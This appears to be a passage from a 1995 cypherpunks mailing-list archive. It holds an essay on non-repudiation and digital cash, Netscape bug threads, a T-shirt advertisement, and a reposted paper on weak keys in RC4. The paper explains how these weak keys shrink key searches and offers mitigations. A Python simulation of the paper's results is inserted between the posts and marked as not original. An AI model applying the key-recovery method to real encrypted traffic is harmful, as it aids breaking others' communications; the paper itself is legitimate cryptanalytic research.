important some of us think it is.

Nonetheless, the fact that both of the founders of this group are focusing
on cryptographic financial objects and/or their network infrastructure
speaks volumes about its importance anyway.

Having laid down that as covering fire ;-), let's talk about creating an
ecosystem of autonomous financial objects on public networks, and why I
think that Tim's post is particularly important.

The reason we have the multiplicity of financial instruments out there to
begin with is because there is money in creating them.  But the reason
there's money in it is because of the fall of the price of networked
computer-based communication.  The market they're traded in exists in
computers.  The decisions made to buy and sell them are at least
facilitated by computers. The clearing and settlement of these instruments
are done on computers.  However, these systems are all centralized, closed,
private systems.  For that reason, the very acceleration of processing
cost-effectiveness which created them is going to sweep them away someday.

The bleeding edge of all this is the so-called 'synthetic' security,
something which exists as a software manifestation of the most recent
financial theory, sometimes only experimental and a few hours old,
sometimes sold to an investment bank's clients just like any other
security, secondary markets and all. A combination of purchases and short
sales of put and call options on a particular bond, which behaves like the
bond in price, for example, without having to hold the bond itself. This is
usually done because the liquidity or the transaction cost of holding these
instruments is lower than that of the bond.  In addition, since unwinding
of the synthetic security should yield the price of the bond after
transaction costs, any discrepancies between the two yields an opportunity
for arbitrage.

Of course, in the early days, all of 10 years ago, theory held somewhat
more promise than reality. The great "portfolio insurance" fiasco of the
early 80's arose from the fact that the options trades which were supposed
to offset the fall of the price of a security in this fashion turned out to
be not very liquid after all. When the time came to unwind these positions
in a hurry, they got stuck. That's not as much of a problem these days, as
evidenced by the proliferation of increasingly sophisticated securities
based on the same idea, which trade and settle just fine.

Note that we're talking about book-entry entities here.  That is, these
modern securities are creatures of an environment where software
"applications" reside on a particular computer on a particular local or
private network, to manipulate centralized accounting entries on that
computer or elsewhere, in order to reflect the expected or traded value of
a security. Things that live "on" a computer. It's controlled completely
from the outside, with the exception of the behavior of the market. Not
"in" it, or "in" the network the computer's hooked into.

Notice how different all that is from a digital certificate like Chaumian
digital cash. When you get a digital certificate, you receive it through a
cryptographic protocol which ensures that it is what it says it is.  If the
certificate is traded on-line, then the certificate's issuer vouches for it
right then and there. If it is traded off-line (someday, I hope...) the
certificate speaks for itself, just like a dollar bill's supposed to.  As
such, it can reside anywhere, not as a book-entry "on" a central computer
somewhere, but "in" the network.

Notice also we are backing down a level of abstraction from the status quo.
A certificate is what it says it is, it is not book-entry, which is a
pointer to something which is what it says it is.

That's the paradox of modern book entry systems. A book entry used to just
"point" to a physical certificate, which in turn points to a cash-flow or a
series of cash-flows of some kind. Of course, the term "book entry" is
almost exclusively used to describe clearing capital market trades without
the physical exchange of certificates for other pieces of paper (receipts,
checks, signature guarantees, etc.). The institutional ideal in this
environment is a clearing-house wire clearing the trade in exchange for a
bank wire transfer settling the trade. The book entry becomes the primary
abstraction, not any certificate it is supposed to represent.

The problem with book entries, of course, is the problem with any database.
You have to manipulate that database, and to do that, you have to get
access, and to do that you need permission... you get the point.  In a
capital market, that costs money, and it's costing more and more as a
percentage of the revenue derived from the transaction, because to get
access, you need human permission and intervention. If a human isn't
supervising things, people take advantage of their access. Mr. Leeson of
Barings was a classic case in point. Meanwhile, Moore's law keeps lowering
the cost of the rest of the production cycle.

Another problem, closer to the heart of this list, is that of anonymity.
The ultimate authority to modify that particular line item or database
field derives from the "owner" of that entry, since it is usually modified
by someone else, "a chain of custody" is needed: audit trails, and of
course, True Names are necessary somewhere, even with numbered accounts.
The primary point for inventing double-entry bookkeeping was so owners could
control accountants, after all.

When electronic book entries started replacing paper ones, the resulting
economies of scale caused great centralization to occur. As I've said here
before, lines were cheaper than nodes, and things got bigger and bigger.
The advent of the microprocessor has been continually eating away at these
large control hierarchies, and making them harder and harder to maintain.
Things are getting out of control again.

In an out of control environment, like that found on public uncontrolled
networks like the internet, software has to be autonomous. A certificate,
like a piece of digital cash, is an autonomous entity. As we said before,
it is what it says it is. Because of a cryptographic protocol, you trust
the thing because of the way it behaves, not because you trust the people
who gave you access to it.

Now, Tim is talking about another type of autonomous entity, an agent,
basically, a "friendly" virus. A piece of code which is launched or
launches itself on one machine, crosses a network, runs itself on another
machine, and returns with a result. Our current concept of software agents
implies that there's something on another machine that needs to be "got",
usually a database requiring access and permissions, which is why people
who manage centralized repositories of information are nervous about them,
just like microcomputers made their mainframe predecessors nervous.

On the other hand, it's easy to see a scenario where two agents arrange to
meet somewhere on a *public* network, in the presence of another
"impartial" agent to exchange certificates, trading, settling and clearing
all in one shot. Unsupervised. Out of control. Because the agents are
engaging in a cryptographic process which "breaks" if the entities behave
improperly, fraud is supposed to be prevented.

Which brings me to something which goes right to the heart of one of our
most cherished ideas here on cypherpunks, the idea of crypto-anarchy: with
the right cryptography, agreements become unenforceable because perfect
anonymity disconnects the "pointers" between digital and physical identity.
Crypto-anarchy means that states don't know who to force to do what.
Technology does this, it's reality, it's not optional, so we better get
used to it. The catch to all of this is a curious conceptual double
negative called non-repudiation.

I had trouble remembering the name for a while, I kept wanting to say
"plausible deniability", in the spirit of Admiral Poindexter. But I've had
to remember the real name, because the idea's so damned important.

Right now, the canon of commercial law for the entire free world (just so I
can't be accused of quibbling here :-) ) is completely based on the concept
of non-repudiation, that is, you can't repudiate an agreement, or a trade,
or you face legal sanction. Force, in other words. Ultimately, the
state can send you to jail, or worse.

About a year ago, when www-buyinfo had active discussion on it, (and had
not yet been turned into cyphe$rpunks by my reflexive redirection there of
all the e$ cheezy-bits from cypherpunks ;-), ) I got into an interesting
discussion there about non-repudiation and I didn't even know I was
involved in one. We were arguing about a familiar dichotomy in the concept
of digital cash, the difference between on-line and off-line protocols.

I was arguing that on-line cash was better because it was a more
"peer-to-peer" proposition than an online system, which required access to
a network connection, and high-bandwidth processing at the certificate
issuer so the issuer could participate in *every* *single* *cash*
*settlement*.  That invasive participation struck me as antithetical to the
whole concept of a hyper-distributed geodesic economy that I thought that
digital commerce was going to become. The technology which made it possible
for anyone, anywhere, to sell anything digitable -- music, movies,
information, teleoperator control sequences, professional services, and
financial instruments -- to anyone else, while using the cheapest possible
transaction protocol, that is, cash, a protocol which immediately and
finally clears and settles a transaction,  will win out in the end.

So, I was finding myself twisting in the wind about all of this, trying to
figure out how offline cash was going to have to work if double-spending
was possible, how it could be kept to manageable levels. I found myself saying
things like (forgive me), "Well, if they double-spend, put 'em in the
airlo- er, throw 'em in jail!". In other words, we have the key of the
double spender, even if she's anonymous, so we could use snitches,
subpoenas of bank records, and plain old detective work, to send her to
jail should she repudiate the agreement to not double-spend.

It's hard to see how that would happen in a perfect world with perfect
anonymity, much less in a world where nation-states couldn't collect income
to pay for judges, courts, and LEAs. Nick Szabo was gleefully slapping me
around the head and shoulders about this, and I retired from the field. So,
no matter how much the idea refuses to leave my thick Frisian head, I'll
leave that big, red, dog ("Hey, baby...") sleeping on the front porch for
the time being. This without even *touching* the other problem with digital
cash in general, Nathaniel Borenstein's favorite anti-digital-cash 2-by-4
-- which threatens *all* digital cash systems on- or off- line -- the
prospect of someone *inside* a certificate issuer stealing the private key
for an entire issue, and printing all the money she wants. To that I say,
use multiple issues, and distribute keys, but I see that big red dog's
waking up, so we'll move on...

So, you can see we're talking about the alleged inability of cryptography
to deal with the repudiation of digital cash trades. It cannot currently
keep transactions either the way cypherpunks want, utterly anonymous, and
the way I want them, off-line.

In fact, at the moment, I'm very close to holding the strong form of this
argument, that is, the concept of non-repudiation is the *only* reason
we're being forced into true-name trades right now. It's not the long arm
of the law, it's the market, which makes sense. If it was just a legal
obstacle, and really contrary to market forces, it should have collapsed
under a barrage of regulatory arbitrage attempts. No threat of legal force
would have prevented people from trying to make money issuing digital cash.
The War on Some Drugs is a good example of this.

If we could get digital cash trades, or trades of any kind of financial
instrument for that matter, to trade on public networks without the ability
to repudiate them, it probably won't matter whether they're illegal, which
is interesting, to say the least, but it's no different from what happens
with paper certificates.

Now, as usual, all this is no brilliant insight on my part. A few days ago,
I didn't know what "non-repudiation" meant.

On Wednesday, I had a very interesting over-coffee conversation with Yet
Another Professional Who Wants To Remain Anonymous. I must be a magnet to
these people for some reason, at least until they figure out I'm not *that*
useful. Or maybe it's because I need so much help. Anyway, people
who were on cypherpunks last summer remember my previous anonymous legal
informant, the esteemed counsellor Vinnie "The Pro" Bono, not to be
confused with his second cousin, the Honorable Sonny. "Vinnie" wanted to
remain anonymous because he was afraid of being deluged with requests for
free legal advice, among other things. I still won't tell you who he was,
but he has since "come out", and, of course, we *aren't* choking his POP
server with requests to get our various relations out of the slammer, or
anything else for that matter, even though he talks freely here under his
True Name.

I expect my new friend will figure this out soon enough. The other reason
he gave is that he's so damn busy he doesn't have time to do much but lurk.

Unfortunately, this guy lurks not here, but on www-buyinfo, having signed
on to cypherpunks and deciding *not* to drink from a firehose, thank you
very much, and since I've been spamming it lately with the aforementioned
cypherpunks e$ cheezy bits, he seems to prefer it there. I have to admit
myself that as much as *I* like it here, it is an acquired taste...

Now, our friend Vinnie has some very serious credentials, but this new guy
is just plain scary because he's so focused on the commercial law of EDI
and electronic commerce. This hypercredentialed gentleman shows up on the
program committee of various "suit" conferences on electronic commerce,
sponsored by various international legal entities and TLAs, and seems to be
up to his elbows in the Current Fantasy according to the Powers that Be, in
particular, its legal armature: legal sanction, non-repudiation, True
Names, and all.

Which leads me to *his* moniker. I thought I was going to be civil about
this, and just refer to him in the third person singular, but I had this
amazing brainstorm. Remember the comedian "Professor" Edwin Corey, who died
recently? His schtick was a variant on the nutty professor, obfuscatory
language, lab coat, Converse high-tops and all, and he called himself
"The World's Foremost Authority". Didn't say on what, which was the point.
As a philosophy major at Mizzou who really loved his informal fallacies,
one of which was the Appeal to Authority, this particular example always
made me laugh. So, I've dubbed this particular informant "Edwin Corey", or
"Mr. Corey" in true Oxfordian fashion, not to be at all uncharitable, but
because, in truth, this guy is probably the world's foremost authority on
this stuff, if anyone is...

He's going to give me pointers to some of this proposed "legal armature"
from time to time, the first of which is a report by one Michael Baum
entitled, deep breath, "Federal Certification Authority Liability and
Policy: Law and Policy of Certificate-Based Public Key and Digital
Signatures".  This 500+ page monster can be obtained from, who else, The
Feds, in particular, another big breath, the United States Department of
Commerce, Technology Administration, National Technical Information
Service, Springfield, VA, 22161; (703) 487-4650. The cost is $61, plus $6
for shipping and handling, plus $2 for orders sent outside the U.S., Canada
or Mexico, plus rush charges if you call 1-800-553-NTIS, and if you *don't*
jump up and down three times *before* you write the check or read them your
credit card over the phone, the trade will be repudiated. ;-).

Oh. It says something here about being able to get it through a web-site
called FedWorld, http://www.fedworld.gov .

So, it's very important to work on financial objects and agents.  However,
I should really try to concentrate on the issue of non-repudiation, because
it is a necessary, and maybe (strong form) necessary and sufficient,
criterion for the development of digital commerce on public networks.

Cheers,
Bob Hettinga



















-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 22 Sep 95 09:30:49 PDT
To: cypherpunks@toad.com
Subject: Reformatted Weak Keys in RC4 for readability.
Message-ID: <9509221627.AA19355@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


I modified only the formatting to get rid of the wrap...I did it so that I
could enjoy reading it and I send it in to y'all so you won't have to do
it as well...it's a wonderful paper.

Patrick

                  A CLASS OF WEAK KEYS IN THE RC4 STREAM CIPHER

                                PRELIMINARY DRAFT

                                   ANDREW ROOS
                          VIRONIX SOFTWARE LABORATORIES


1.  INTRODUCTION

This paper discusses a class of weak keys in RSA's RC4 stream cipher. It shows
that for at least 1 out of every 256 possible keys the initial byte of the
pseudo-random stream generated by RC4 is strongly correlated with only a few
bytes of the key, which effectively reduces the work required to exhaustively
search RC4 key spaces.


2.  STATE TABLE INITIALIZATION IN RC4

Although the RC4 algorithm has not been published by RSA Data Security, source
code to implement the algorithm was anonymously posted to the Cypherpunks   
mailing list several months ago. The success of the Cypherpunks' brute-force
attack on SSL with a 40-bit key indicates that the source code published did
accurately implement RC4.

RC4 uses a variable length key from 1 to 256 bytes to initialize a 256-byte
state table which is used for the subsequent generation of pseudo-random bytes.
The state table is first initialized to the sequence {0,1,2,...,255}.   
Then:

1    index1 = 0;
2    index2 = 0;
3
4    for(counter = 0; counter < 256; counter++)
5    {
6        index2 = (key_data_ptr[index1] + state[counter] + index2) % 256;   
7        swap_byte(&state[counter], &state[index2]);
8        index1 = (index1 + 1) % key_data_len;
9    }

Note that the only line which directly affects the state table is line 7, when
two bytes in the table are exchanged. The first byte is indexed by "counter",
which is incremented for each iteration of the loop. The second byte is
indexed by "index2" which is a function of the key. Hence each element of the
state table will be swapped at least once (although possibly with itself),
when it is indexed by "counter". It may also be swapped zero, one or more   
times when it is indexed by "index2". If we assume for the moment that
"index2" is a uniformly distributed pseudo-random number, then the probability
that a particular single element of the state table will be indexed by
"index2" at some time during the initialization routine is:

     P = 1 - (255/256) ^ 255
       = 0.631

(The exponent is 255 because we can disregard the case when "index2" and
"counter" both index the same element, since this will not affect its value.)

Conversely, there is a 37% probability that a particular element will _not_ be
indexed by "index2" during initialization, so its final value in the state
table will only be affected by a single swap, when it is indexed by "counter".
Since key bytes are used sequentially (starting again at the beginning when the
key is exhausted), this implies:

A.   Given a key length of K bytes, and E < K, there is a 37% probability that
     element E of the state table depends only on elements 0..E (inclusive) of
     the key.

(This is approximate since "index2" is unlikely to be uniformly distributed.)

In order to make use of this, we need to determine the most likely values for
elements of the state table. Since each element is swapped at least once (when
it is indexed by "counter"), it is necessary to take into account the likely
effect of this swap. Swapping is a nasty non-linear process which is hard to
analyze. However, when dealing with the first few elements of the state table,
there is a high probability that the byte with which the element is swapped
has not itself been involved in any previous exchanges, and therefore retains
its initial value {0,1,2,...,255}. Similarly, when dealing with the first few
elements of the state table, there is also a significant probability that none
of the state elements added to index2 in line 6 of the algorithm has been   
swapped either.

This means that the most likely value of an element in the state table can be
estimated by assuming that state[x] == x in the algorithm above. In this case,
the algorithm becomes:

1    index1 = 0;
2    index2 = 0;
3
4    for(counter = 0; counter < 256; counter++)
5    {
6        index2 = (key_data_ptr[index1] + counter + index2) % 256;   
7        state[counter] = index2;
8        index1 = (index1 + 1) % key_data_len;
9    }

Which can be reduced to:

B.   The most likely value for element E of the state table is:

     S[E] = X(E) + E(E+1)/2
     where X(E) is the sum of bytes 0..E (inclusive) of the key.

(when calculating the sum of key elements, the key is considered to "wrap
around" on itself).

Given this analysis, we can calculate the probability for each element of the
state table that its value is the "most likely value" of B above. The easiest
way to do this is to evaluate the state tables produced from a number of
pseudo-randomly generated RC4 keys. The following table shows the results for
the first 47 elements from a trial of 100 000 eighty-bit RC4 keys:

          Probability (%)

0-7       37.0  36.8  36.2  35.8  34.9  34.0  33.0  32.2
8-15      30.9  29.8  28.5  27.5  26.0  24.5  22.9  21.6
16-23     20.3  18.9  17.3  16.1  14.7  13.5  12.4  11.2
24-31     10.1   9.0   8.2   7.4   6.4   5.7   5.1   4.4
32-39      3.9   3.5   3.0   2.6   2.3   2.0   1.7   1.4
40-47      1.3   1.2   1.0   0.9   0.8   0.7   0.6   0.6

The table confirms that there is a significant correlation between the first
few values in the state table and the "likely value" predicted by B.


3.  WEAK KEYS

The RC4 state table is used to generate a pseudo-random stream which is XORed
with the plaintext to give the ciphertext. The algorithm used to generate the
stream is as follows:

     x and y are initialized to 0.

     To generate each byte:

1    x = (x + 1) % 256;
2    y = (state[x] + y) % 256;
3    swap_byte(&state[x], &state[y]);   
4    xorIndex = (state[x] + state[y]) % 256;   
5    GeneratedByte = state[xorIndex];

One way to exploit our analysis of the state table is to find circumstances
under which one or more generated bytes are strongly correlated with a small
subset of the key bytes.

Consider what happens when generating the first byte if state[1] == 1.

1    x = (0 + 1) % 256;                  /* x == 1 */
2    y = (state[1] + 0) % 256;           /* y == 1 */
3    swap_byte(&state[1], &state[1]);    /* no effect */
4    xorIndex = (state[1] + state[1]);   /* xorIndex = 2 */
5    GeneratedByte = state[2]

And we know that state[2] has a high probability of being

     S[2] = K[0] + K[1] + K[2] + 2 (2+1) / 2

Similarly,

     S[1] = K[0] + K[1] + 1 (1+1) / 2

So to make it probable that S[1] == 1, we have:

     K[0] + K[1] == 0 (mod 256)

In which case the most likely value for S[2] is:

     S[2] = K[2] + 3

This allows us to identify a class of weak keys:

C.   Given an RC4 key K[0]..K[N] with K[0] + K[1] == 0 (mod 256), there is a
     significant probability that the first byte generated by RC4 will be   

     K[2] + 3 (mod 256).

Note that there are two special cases, caused by "unexpected" swapping during
key generation. When K[0]==1, the "expected" output byte is k[2] + 2, and when
k[0]==2, the expected value is k[2] + 1.

There are a number of similar classes of "weak keys" which only affect a few
keys out of every 65536. However the particular symmetry in this class means
that it affects one key in 256, making it the most interesting instance.

Once again I took the easy way out and used simulation to determine the
approximate probability that result C holds for any given key. Probabilities
ranged between 12% and 16% depending on the values of K[0] and K[1], with a
mean of about 13.8%. All these figures are significantly greater than the   
0.39% which would be expected from an uncorrelated generator. The key length
used was again 80 bits. This works the other way around as well: given the
first byte B[0] generated by a weak key, the probability that K[2]==B[0]-3
(mod 256) is 13.8%.

       

4.  EXPLOITING WEAK KEYS IN RC4

Having found a class of weak keys, we need a practical way to attack RC4 based
cryptosystems using them. The most obvious way would be to search potential
weak keys first during an exhaustive attack. However since only one in every
256 keys is weak, the effective reduction in search space is not particularly
significant.

The usefulness of weak keys does increase if the opponent is satisfied with
recovering only a percentage of the keys subjected to analysis. Given a known
generator output which includes the first generated byte, one could assume
that the key was weak and search only the weak keys which would generate the
known initial byte. Since 1 in 256 keys is weak, and there is a 13.8% chance
that the assumed value of K[2] will be correct, there is only a 0.054% chance
of finding the key this way. However, you have reduced the search space by 16
bits due to the assumed relationship between K[0] and K[1] and the assumed
value of K[2], so the work factor per key recovered is reduced by a factor of
35, which is equivalent to reducing the effective key length by 5.1 bits.

However in particular circumstances, the known relationships between weak keys
may provide a much more significant reduction in workload. The remainder of
this section describes an attack which, although requiring very specific
conditions, illustrates the potential threat.

As a stream cipher, a particular RC4 key can only be used once. When multiple
communications sessions are required, some mechanism must be provided for   
generating a new session key each time. Let us suppose that an implementation
chose the simple method of incrementing the previous session key to get the
new session key, and that the session key was treated as a "little endian"
(least significant byte first) integer for this purpose.

We now have the interesting situation that the session keys will "cycle
through" weak keys in a pattern which repeats every 2^16 keys:

00 00 00 ...    Weak
(510 non-weak keys)
FF 01 00 ...    Weak
(254 non-weak keys)
FE 02 00 ...    Weak
(254 non-weak keys)
FD 03 00 ...    Weak
...
01 FF 00 ...    Weak
(254 non-weak keys)
00 00 01 ...    Weak
(510 non-weak keys)
FF 01 01 ...    Weak

(Least significant byte on the left)

Now while an isolated weak key cannot be identified simply from a known
generator output, this cycle of weak keys at known intervals can be identified
using statistical techniques since each of the weak keys has a higher than
expected probability of generating the _same_ initial byte. This means that an
opponent who knew the initial generated bytes of about 2^16 session keys could
identify the weak keys, and would also be able to locate the 510-key gap
between successive cycles of weak keys (although not precisely). Since the
510-key gap occurs immediately following a key which begins with 00 00, the
opponent not only knows that the keys are weak, but also knows the first two
bytes of each key. The third byte of each key can be guessed from the first
output byte generated by the key, with a 13.8% chance of a correct guess.   

Assuming that the "510-key gap" is narrowed down to 1 of 8 weak keys, the   
attacker can search a key space which is 24 bits less than the size of the
session keys, with a 13.8%/8 chance of success, effectively reducing the key
space by approximately 18 bits.

Although this particular attack depends on a very specific set of
circumstances, it is likely that other RC4 based cryptosystems in which there
are linear relationships between successive session keys could be vulnerable
to similar attacks.


5.  RECOMMENDATIONS

The attacks described in this algorithm result from inadequate "mixing" of key
bytes during the generation of the RC4 state table. The following measures
could be taken to strengthen cryptosystems based on the RC4 algorithm:

(a) After initializing the algorithm, generate and discard a number of bytes.
    Since the algorithm used to generate bytes also introduces additional
    non-linear dependencies into the state table, this would make analysis
    more difficult.

(b) In systems which require multiple session keys, ensure that session keys
    are not linearly related to each other.

(c) Avoid using the weak keys described.


6.  CONCLUSION

This preliminary analysis of RC4 shows that the algorithm is vulnerable to
analytic attacks based on statistical analysis of its state table. It is
likely that a more detailed analysis of the algorithm will reveal more
effective ways to exploit the weaknesses described.



Andrew Roos <andrewr@vironix.co.za>
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/
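
The figures quoted in the RC4 analysis above (the 13.8% correlation for weak keys, the 510/254 spacing of weak keys under a little-endian counter) can be re-checked with a short simulation, and the same run shows the effect of recommendation (a). This is an added example, not code from the original post; the 256-byte discard count, the trial count, the seed and all function names are assumptions, and the keys are randomly constructed 80-bit test keys.

```python
import random

KEY_LEN = 10   # 80-bit keys, the length used in the simulations described above
DROP = 256     # assumed discard count; the post only says "a number of bytes"


def ksa(key):
    """RC4 key schedule: build the 256-entry state table from the key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def keystream_byte(key, skip=0):
    """Return the keystream byte produced after discarding `skip` bytes."""
    s = ksa(key)
    i = j = out = 0
    for _ in range(skip + 1):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out = s[(s[i] + s[j]) & 0xFF]
    return out


def random_key(rng, weak):
    """Constructed test key; a weak key has K[0] + K[1] == 0 (mod 256)."""
    key = [rng.randrange(256) for _ in range(KEY_LEN)]
    if weak:
        key[1] = (-key[0]) & 0xFF
    return key


def hit_rate(weak, skip, trials=4000, seed=1995):
    """Fraction of keys whose byte after `skip` discards equals K[2] + 3."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(trials):
        key = random_key(rng, weak)
        if keystream_byte(key, skip) == (key[2] + 3) & 0xFF:
            hits += 1
    return hits / trials


def weak_key_gaps():
    """Non-weak keys between successive weak keys when the session key is a
    little-endian counter (only the two low bytes decide weakness)."""
    weak = [n for n in range(2 ** 16 + 1)
            if ((n & 0xFF) + ((n >> 8) & 0xFF)) % 256 == 0]
    return [b - a - 1 for a, b in zip(weak, weak[1:])]


if __name__ == "__main__":
    print("weak keys, first byte      :", hit_rate(True, 0))
    print("random keys, first byte    :", hit_rate(False, 0))
    print("weak keys, after discarding:", hit_rate(True, DROP))
    gaps = weak_key_gaps()
    print("gaps in one 2^16 cycle     :", gaps[0], sorted(set(gaps[1:])))
```

The first rate should land near the quoted 13.8%, while the other two should sit near the 1/256 expected from an uncorrelated generator.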




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Fri, 22 Sep 95 02:29:06 PDT
To: cypherpunks@toad.com
Subject: Re: YET ANOTHER BAD NETSCAPE HOLE!
In-Reply-To: <199509220830.EAA13828@clark.net>
Message-ID: <43tvj4$t7v@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509220836.EAA14476@clark.net>, rjc@clark.net (Ray Cromwell) writes:
> Disregard that last message. Those drugs I was taking must have just kicked
> in. I was running another program in the background which coincidentally
> brought up an xterm at the same time I clicked on the link. Damn,
> and I thought I had found another bug. Ah well. There's probably one lurking
> there somewhere. It was good while it lasted. When I hit "send" and
> that xterm popped up, I almost jumped out of my seat. ;-) Remember
> this lesson, you should always try to repeat your bugs at least three
> times. ;-)

  Thanks for quickly posting this retraction.  For the record, netscape
talks SMTP directly, and does not run an external program to send mail.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Halvor Kise jr." <halvork@frodo.hiof.no>
Date: Fri, 22 Sep 95 00:20:14 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <Pine.LNX.3.91.950922092643.8228B-100000@frodo.hiof.no>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 22 Sep 1995, Ray Cromwell wrote:
> I've found a Netscape bug which I suspect is a buffer overflow and
> may have the potential for serious damage. If it is an overflow bug,
> then it may be possible to infect every computer which accesses a web
> page with Netscape. To see the bug, create an html file containing
> the following:

Yes! Nice! At last I can include a big Netrape icon on my homepage.
Maybe with the text "Netscape users, click here.."
All the link does is to crash netscape...
At last!  Thanks Ray!
:-)

- - Halvor.


 
--
                          *** MEMENTO MORI ***

                PGP-key by fingering halvork@frodo.hiof.no
                       http://www.hiof.no/~halvork/

            * Support The Phil Zimmermann legal defense fund *
                      http://www.netresponse.com/zldf





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dhenson@itsnet.com (Don Henson)
Date: Fri, 22 Sep 95 08:42:57 PDT
To: cypherpunks@toad.com
Subject: Munition (RSA/Perl) T-shirts Now Shipping From Stock!
Message-ID: <199509221557.JAA23019@scratchy.itsnet.com>
MIME-Version: 1.0
Content-Type: text/plain


By now, everyone knows about the TSHIRT that has been classified as a 
MUNITION by the US Government. If you don't know, just send email to 
wepinsto@colossus.net with a subject of 'TSHIRT STORY' and you will 
receive full details via return email.

We have thus far shipped over 850 of the RSA/Perl Munition T-shirts and 
are now in a position to ship most orders from stock. You no longer 
have to pay your money and wait for months to get your t-shirt while 
someone else collects interest on YOUR money. We (WEPIN Store) can ship 
your t-shirt within two weeks of receiving your order. Orders are still 
pouring in. Don't be left out. Order yours today. (Read some comments 
of our customers at the end of this post.)

For more information on how to own this classic example of civil 
disobedience, just send email to wepinsto@colossus.net with the subject 
of 'SHIRT'. (You don't have to be a US/Canadian citizen to request the 
info.) Or, if you have WWW access, just point your Web browser to:

     http://colossus.net/wepinsto/wshome.html

By the way, 25% of the profits from the sale of the tshirt (in the 
US/Canada) goes to the PHIL ZIMMERMANN LEGAL DEFENSE FUND to help 
defend the author of PGP from harassment and possible prosecution by 
the Fedgoons.

And if you get arrested for wearing the Munitions Tshirt, we'll refund 
your purchase price.  :-)

                          ====++++====++++

Here are some testimonials from a few of our many satisfied customers:

"Got mine this afternoon.  Wooohhaah!!  Already had some folks at
Blockbusters point, mumble to themselves, and then ask me what the
munitions warning meant.  This is going to be fun!!  I'm a cyphernerd
for sure..."

"Thanks for the great T-shirt.  I'm making copies of your paper order 
form for others."

"I think I'll have to wear the shirt over to Logan Airport and hang 
around the International Arrivals terminal a few times.   <G>"

"I received the T-shirt on 8/3.  Thank you, it has been a pleasure 
dealing with you!"

"The first thing that I did after it arrived was to don it and then go
visit the office of one of our visiting researchers from Russia.  :)~"

                          ====++++====++++

Get your Munitions Tshirt now. Who knows how long they'll stay in 
production!

Don Henson, Managing Director (PGP Key ID = 0X03002DC9)
West El Paso Information Network (WEPIN)
email: wepinsto@colossus.net
Check out The WEPIN Store at URL:
http://colossus.net/wepinsto/wshome.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: herbs@interlog.com (Herb Sutter)
Date: Fri, 22 Sep 95 06:41:58 PDT
To: cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <199509221341.JAA07664@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:33 1995.09.22 GMT, Jeff Weinstein wrote:
>In article <199509220612.CAA11441@clark.net>, rjc@clark.net (Ray Cromwell) writes:
>> I've found a Netscape bug which I suspect is a buffer overflow and
>> may have the potential for serious damage. If it is an overflow bug,
>> then it may be possible to infect every computer which accesses a web
>> page with Netscape. To see the bug, create an html file containing
>> the following:
>
>  Thanks for the report.  I will make sure that this is fixed.
>
>	--Jeff

Don't just look at this bug, though... check ALL your static buffers and
include code to check for overflow writes.  For example, if Netscape is
written in C or C++ and the above code uses strcpy(), you could change
strcpy() to strncpy() everywhere (and then set the last char to null in case
strncpy() didn't).  Your programmers will know what I mean.

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Fri, 22 Sep 95 07:06:55 PDT
To: tomw@cthulhu.engr.sgi.com
Subject: Re: Netscape closes up 1 3/8 today!
In-Reply-To: <199509211846.LAA04164@orac.engr.sgi.com>
Message-ID: <9509221401.AA26983@outland>
MIME-Version: 1.0
Content-Type: text/plain



	I've been lurking for a week or two, but I wanted to say
something about this:

> I think it probably has more to do with the fact that the name
> "Netscape" has been on the front page of every major newspaper in the
> US.  I guess bad press is better than no press at all.  And the press
> hasn't even been that bad.

	And you have to take into account that a good chunk of the
population has no clue about how either encryption (well, basic math
for a good chunk :/ )  or software works.  Just heard something on the
radio (Niel Bortz, if you're curious) about how California public 
schools have started giving credit for wrong answers on MATH tests.
So the students don't _feel bad_ about being wrong.  I want to trust 
my life to an airplane designed by someone who got the right answers,
not to someone who has artificially induced high self-esteem. 

	The casual Joe Sixpack at most may know that if Microsloth 
Doesn'tWorks has a problem he goes out 9 months later and shells out 
more $$$ for the next buggy release. Start mentioning 128-bit IDEA, 
entropy, or pseudo-anything and their eyes may just glaze over.  With
the state of public education, it'll be amazing if Joe Sixpack can 
figure out that he has to plug in his computer first; never mind 
understand why trusting his financial secrets to a secret "proprietary"
encryption scheme that the gubument has the back door to is a bad idea.
